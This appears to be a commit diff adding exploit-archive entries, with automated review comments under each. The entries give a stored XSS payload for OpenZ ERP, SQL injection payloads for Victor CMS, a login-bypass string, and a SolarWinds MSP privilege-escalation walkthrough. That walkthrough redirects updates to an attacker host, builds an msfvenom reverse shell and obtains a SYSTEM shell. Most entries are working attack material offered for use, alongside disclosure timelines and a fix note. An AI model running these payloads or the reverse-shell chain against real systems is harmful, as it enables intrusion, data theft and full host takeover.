src=evil.source><iframe></iframe></iframe>&
inpdescription=>"><iframe
src=evil.source><iframe></iframe></iframe>&inpimageurl=31337&
inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
inpcity=&inpcreated=26-04-2020
17:03:35&inpcreatedby=Service&inpupdated=26-04-2020
17:03:35&inpupdatedby=Service
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.38 (Debian)
Location:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
- (Execution in Listing)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
Host: myerponline.de
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Debian)
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1110
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
PoC: Vulnerable Source (/security/Menu.html)
<table width="0px" height="0px" cellspacing="0" cellpadding="0">
<tbody><tr>
<td><input type="text" class="DataGrid_Table_Dummy_Input"
id="grid_table_dummy_input"></td>
</tr>
</tbody></table>
<input type="hidden" name="inpcBpartnerId"
value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent">
<div class="RelationInfoContainer">
<table class="RelationInfo">
<tbody><tr>
<td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td>
<td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 -
>"><iframe src="a"></TD>
</TR>
Reference(s):
https://localhost:8080/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
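Review bot: the "Execution in Listing" request near the end carries `Host: myerponline.de` while its Referer and every other URL in the advisory are on `localhost:8080`; that indicates the capture was taken against a third-party production host, and the hostname should be scrubbed (or the lab host restored) before this is published. The parameter naming is inconsistent too: Technical Details spells the second parameter `inpdescripción`, while the Vulnerable Parameter(s) block and the POST body use `inpdescription`, which is the real form field. Lastly, the "Vulnerable Source" block is labelled `/security/Menu.html`, but the unescaped value is rendered in `#paramParentC_BPartner_ID` of the Employee `_Relation.html` page that the POST targets, so the file label should match the page where execution was observed.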


@ -0,0 +1,52 @@
# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection
# Google Dork: N/A
# Date: 2020-05-09
# Exploit Author: BKpatron
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Discription:
# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page.
# vulnerable file : post.php
http://localhost/CMSsite-master/post.php?post=1
Parameter: post (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: post=1 AND 2333=2333
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/CMSsite-master/post.php?post=sqli
http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g
Connection: keep-alive
Upgrade-Insecure-Requests: 1
post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
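Review bot: The trailing line `post=1%20UNION%20ALL%20SELECT ...--%20PTYU` after the GET request headers is not part of the request: a GET carries no body and the same value already sits in the request line, so it should be dropped or labelled as the decoded parameter value. `# Discription:` in the header should read `# Description:`. The entry names `post.php` and the `post` parameter but gives no remediation; since the parameter is a numeric id (`post=1`), one sentence noting that the value must be bound through a prepared statement (or at least cast to an integer) rather than concatenated into the query would help readers triaging the issue.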

@ -0,0 +1,29 @@
# Exploit Title: complaint management system 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-10
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Complaint%20Management%20System/admin/
POST /Complaint%20Management%20System/admin/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Complaint%20Management%20System/admin/
Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
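Review bot: The request body on the last line, `username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined`, carries a stray `: undefined` suffix; the declared `Content-Length: 61` matches the body exactly up to `submit=`, so the suffix is editor residue and should be removed. `Cookie:PHPSESSID=...` is missing the space after the colon, and the title `complaint management system 1.0` should be capitalised as in the files.csv entry. The entry states only the payload; a note that the fix is a parameterised query for the `admin/index.php` credential lookup with a server-side hash comparison would make it more than a login-bypass string.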

@ -0,0 +1,166 @@
# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
# Date: 2020-05-06
# Vendor: https://www.solarwindsmsp.com/
# CVE: CVE-2020-1260
# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
# CWE: 276
Vulnerable version
==================
SolarWinds MSP PME (Patch Management Engine) before 1.1.15
Timeline
========
2020-04-24 Vulnerability discovered
2020-04-27 Send details to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure
Description
===========
An error with insecure file permissions has occurred in the SolarWinds
MSP Cache Service, which is part of the Advanced Monitoring Agent and
can lead to code execution. The SolarWinds MSP Cache Service is
typically used to get new update definition files and versions for
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
that the parameter SISServerURL can be changed, which controls the
location of the updates. After some analysis, we were able to provide
modified XML files (PMESetup_details.xml and
ThirdPartyPatch_details.xml) that point to an executable file with a
reverse TCP payload using our controlled SISServerURL web server for
SolarWinds MSP Cache Service.
Proof of Concept (PoC)
======================
As we can see, NTFS change permissions are set to CacheService.xml by
default. Any user on the system who is in group users can change the
file content. This is especially a big problem on terminal servers or
multi-user systems.
PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
NT-AUTORITÄT\SYSTEM:(I)(F)
VORDEFINIERT\Administratoren:(I)(F)
1. Modify CacheService.xml
In the xml file, the parameter SISServerURL was adjusted, which now
points to a web server controlled by the attacker.
<?xml version="1.0" encoding="utf-8"?>
<Configuration>
<CachingEnabled>True</CachingEnabled>
<ApplianceVersion>1.1.14.2223</ApplianceVersion>
<CacheLocation>C:\ProgramData\SolarWinds
MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
<CacheSizeInMB>10240</CacheSizeInMB>
<SISServerURL>https://evil-attacker.example.org</SISServerURL>
<LogLevel>5</LogLevel>
<Proxy></Proxy>
<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
<ProxyCacheService />
<CacheFilesDeleted></CacheFilesDeleted>
<CacheDeletedInBytes></CacheDeletedInBytes>
<HostApplication>RMM</HostApplication>
<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>
2. Payload creation
Generate an executable file, for example using msfvenom, that
establishes a reverse tcp connection to the attacker and store it on the
web server.
msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
exe > /tmp/solarwinds-shell.exe
3. Prepare web server
Place the modified xml files (PMESetup_details.xml or
ThirdPartyPatch_details.xml) on the web server in the path
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
executable, set correct values for SizeInBytes and increase the version.
Example of PMESetup_details.xml
<ComponentDetails>
<Name>Patch Management Engine</Name>
<Description>Patch Management Engine</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.1.14.2224</Version>
</ComponentDetails>
Example of ThirdPartyPatch_details.xml
<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>
4. Malicious executable download
After restarting the system or reloading the CacheService.xml, the
service connects to the web server controlled by the attacker and
downloads the executable file. This is then stored in the path
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
[24/Apr/2020:10:57:01 +0200] "HEAD
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
5. Getting shell
After a certain time the executable file is executed by SolarWinds MSP
RPC Server service and establishes a connection with the rights of the
system user to the attacker.
[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
C:\WINDOWS\system32>whoami
whoami
nt-authority\system
C:\WINDOWS\system32>
Fix
===
There is a new PME version 1.1.15 which comes with auto-update
https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/
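Review bot: The `# CVE: CVE-2020-1260` line disagrees with the GitHub link on the next line, which points to `.../CVE-2020-12608`; the header line appears to have lost its last digit and the two should agree. In the timeline, `2020-04-27 Send details to SolarWinds PSIRT` should read `Sent details`. The Fix section only points to PME 1.1.15; since the `icacls` output (`VORDEFINIERT\Benutzer:(I)(M)`) shows the root cause is the Modify right for the Users group on `CacheService.xml`, an interim mitigation for hosts that cannot update yet (restricting that file's ACL to SYSTEM and Administrators) and a detection hint (the Cache Service fetching `/ComponentData/RMM/1/` from a host other than the vendor's SISServerURL, as in the access-log lines under step 4) would make the advisory more useful to defenders.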

@ -11069,6 +11069,7 @@ id,file,description,date,author,type,platform,port
48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42674,3 +42675,13 @@ id,file,description,date,author,type,platform,port
48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
48442,exploits/linux/webapps/48442.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution",2020-05-10,"Nick Frichette",webapps,linux,
48443,exploits/linux/webapps/48443.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation",2020-05-10,"Nick Frichette",webapps,linux,
48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,
48445,exploits/aspx/webapps/48445.txt,"Kartris 1.6 - Arbitrary File Upload",2020-05-11,"Nhat Ha",webapps,aspx,
48446,exploits/php/webapps/48446.txt,"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
48447,exploits/php/webapps/48447.txt,"CuteNews 2.1.2 - Arbitrary File Deletion",2020-05-11,Besim,webapps,php,
48450,exploits/php/webapps/48450.txt,"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,
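Review bot: `Privileges Escalation` in the 48443 description should read `Privilege Escalation`, and the 48452 description `Complaint Management System 1.0 - Authentication Bypass` is capitalised differently from the `# Exploit Title:` line inside 48452.txt (`complaint management system 1.0`); align the two, since the csv description is what the index displays.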
